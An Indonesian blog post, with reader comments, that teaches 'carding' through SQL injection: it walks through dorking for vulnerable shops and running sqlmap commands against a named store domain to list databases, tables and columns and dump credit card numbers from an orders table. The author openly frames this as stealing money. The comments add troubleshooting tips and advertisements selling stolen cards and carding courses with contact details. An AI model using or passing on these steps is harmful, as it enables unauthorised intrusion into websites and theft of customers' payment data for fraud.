Kali ini Nuenomaru akan menjelaskan dan mempraktekan Carding dengan SQL Map di Linux.
Untuk para pengguna Jendela alias Windows silahkan download dulu toolnya di google agar bisa dijalankan di Python.
Soalnya kali ini Nue akan menjelaskan nya di OS pinguin ;)
utk para pengguna linux silahkan merapat.
Pertama kita siapkan tools" nya dahulu :
1. sqlmap
2. dork carding ( bisa cari di google ) / downloaduntuk dorking di linux bisa mampir di thread ini dulu: Dorking Dengan BinGoo Di Linux
Pertama tama pastekan Dork di mbah Google.
cari web yang akan di jadikan Target.
Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="
http://www.target.com/merchandise/index.php?cat=268
menjadi :
http://www.target.com/merchandise/index.php?cat='268
menjadi :
http://www.target.com/merchandise/index.php?cat='268
Nah, web tersebut error saat kita inject ,
Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap -u link --dbs
berikut perintahnya : ./sqlmap -u link --dbs
contoh: sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 --dbs
Disini kita mendapatkan 3 database :
[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap -u link -D namadatabase --tables
gunakan perintah : ./sqlmap -u link -D namadatabase --tables
( disini saya coba database "balboast_gkgcart" )
contoh:
sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 -D balboast_gkgcart --tables
nah, saya dapat tables nya :
nah, saya dapat tables nya :
Database: balboast_gkgcart
[88 tables]
+-----------------------+
| amanu |
| categories |
| clients |
| components |
| config |
| config_groups |
| customers |
| form_data |
| form_fields |
| forms |
| geo |
| groups |
| item_amanu |
| item_cat |
| item_files |
| item_files_customer |
| item_options |
| item_options_linked |
| item_options_values |
| item_related |
| item_thread |
| item_thread_old |
| items |
| items_addphoto |
| items_item_files |
| items_packages |
| languages |
| logs |
| mailinglist |
| mailinglist_cat |
| mailinglist_members |
| manu |
| news |
| news_cat |
| news_news_cat |
| orders |
| photos |
| photos_cat |
| pic_gallery |
| ship_prices |
| ship_zones |
| sites |
| sites_components |
| thread |
| thread_gel |
| thread_items |
| ups |
| ups_packaging |
| ups_pickup |
| ups_service |
| ups_units |
| users |
| users_access |
| users_groups |
| users_spu |
| users_spu_values |
| zones |
+-----------------------+
[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'
Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap -u link -D namadatabase -T namatable --columns
Gunakan perintah : sqlmap -u link -D namadatabase -T namatable --columns
contoh:
sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders --columns
Maka akan muncul seperti ini :
Table: orders
[18 columns]
+-----------------+-------------+
| Column | Type |
+-----------------+-------------+
| cart_id | varchar(15) |
| cc_ex_month | tinyint(4) |
| cc_ex_year | int(11) |
| cc_number | varchar(30) |
| cc_type | varchar(20) |
| customer_id | int(11) |
| cvv2 | varchar(20) |
| date | datetime |
| id | int(11) |
| ipaddress | varchar(25) |
| payment_method | varchar(15) |
| shipping | float(8,2) |
| shipping_method | varchar(5) |
| status | tinyint(4) |
| subtotal | float(8,2) |
| tax | float(8,2) |
| text | text |
| total | float(8,2) |
+-----------------+-------------+
[18 columns]
+-----------------+-------------+
| Column | Type |
+-----------------+-------------+
| cart_id | varchar(15) |
| cc_ex_month | tinyint(4) |
| cc_ex_year | int(11) |
| cc_number | varchar(30) |
| cc_type | varchar(20) |
| customer_id | int(11) |
| cvv2 | varchar(20) |
| date | datetime |
| id | int(11) |
| ipaddress | varchar(25) |
| payment_method | varchar(15) |
| shipping | float(8,2) |
| shipping_method | varchar(5) |
| status | tinyint(4) |
| subtotal | float(8,2) |
| tax | float(8,2) |
| text | text |
| total | float(8,2) |
+-----------------+-------------+
Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap -u link -D namadatabase -T namatable --dump
contoh :
Caranya : ./sqlmap -u link -D namadatabase -T namatable --dump
contoh :
sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .
maka nanti cc number akan muncul walau proses agak lama .
semua proses sqlmap akan lama tergantung banyaknya database, tables , columns yang dimiliki web target.
ya jika kalian hanya ingin mau melihat pasword dan user admin web :v coba aja cari sendiri di databasenya :v yaa kalo yang udh masuk ke DB mengarah ke orders :v ya berarti lo lagi mo nyolong uangnya :p
untuk para pengguna windows silahkan download dan instal python,, lalu cari sqlmap.py :D
perintahnya sama aja kok.
perintahnya sama aja kok.
Yosh semoga membantu ,, maaf jika masih banyak kekurangan ^_^
tapiii semogaaaa bermanfaat minnaaaa.
./Nuenomaru
Nuenomaru Just an illusion in Cyber World
Visit and follow :
BBM : C0018D1A2
18 comments
gan itu agan jalaninnya pake cmd kan?
maaf baru bales kak ^^
baru lihat notif komen di blog utk artikel ini *hehe trnyata ada yang komen..
gini kak, ini saya jalanin di live kali linux, jalanin ini tool lwt terminal di Linux.. tapi ada kok sql map yang di windows *search aja digoogle lbh lengkapnya.
nah kalo yg sql map utk di windows itu jalaninnya lwt CMD ..
sekian, semoga sukses..
Nuenomaru
gan.. cara cari link sasaran gimana??
pakai dork gans :D
Nuenomaru
Nda pake dihash kah mastah biasa nya kan masih nomer acak jadinya
di sqlmap ini dah ada fitur utk hashnya kok bang..
ya kalo sqlmapnya gak bisa ngedecrypt, silahkan cari utk fitur hash di google, atau pakai hash killer utk Linux
#Nuenomaru
om ko ane sekarang suka ada [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
kyk gitulah. gangerti T_T
https://github.com/sqlmapproject/sqlmap/issues/1513
#Nuenomaru
Itu kalau jalanin sql map windows sama ajakan sama yang os atau beda by:didikan bang michael
ini python versi berapa aja samakan ? (user windows)
Thanks for writing such a good article, I stumbled onto your blog and read a few post. I like your style of writing...
hacking forum
Yuk order cc us 70k. Masih fresh
Minat hubungi
Line:cardthis
Mail:manilucrot@gmail.com
Update 2 juni 2017
Jual CC hasil scam FRESH 100% ALL COUNTRY RANDOM Kami Sediakan CC dalam 1 Paket untuk segala Transaksi Online ( ORDER BARANG, TOP UP GAME ONLINE, PLAYSTORE GOOGLE, RESERVASI TIKET, DLL ) 1 Paket CC memiliki :
* 3 CREDIT CARD CARDING
* GARANSI GANTI CC BARU ATAU GARANSI UANG KEMBALI.
* Tersedia Testimoni yang TERPERCAYA 1000000000%
* cc Dijamin FRESH & WORK 1000000000%
* Metode/Tutorial yang Terupdate/Terbaru Dijamin ANTI CIDUK.
Cp : line : yoy2331
Thx Work by termux :)
Open Dinasty Fams Carding Learning VVIP
Include :
- Racik dork private lock country fresh
- ultimate dump private fresh list vip
- Scampage full learning sampe dapat CC
- SC Private with auto SSL anti detect
- VPN terbaik buat order
- order methode VVIP
And etc
Just 500K for all in one
Males nyari cc udh bisa order sendiri??
Sedia CC fresh borong per email result no ecer"
Harga trgantung banyak result yang ada
Contact :
Line
@muhammadw1
Email
dinastycard@gmail.com
Kalo udh dapet empas nya gimana ?
Ini untuk apa bang
Pake git clone kah?
EmoticonEmoticon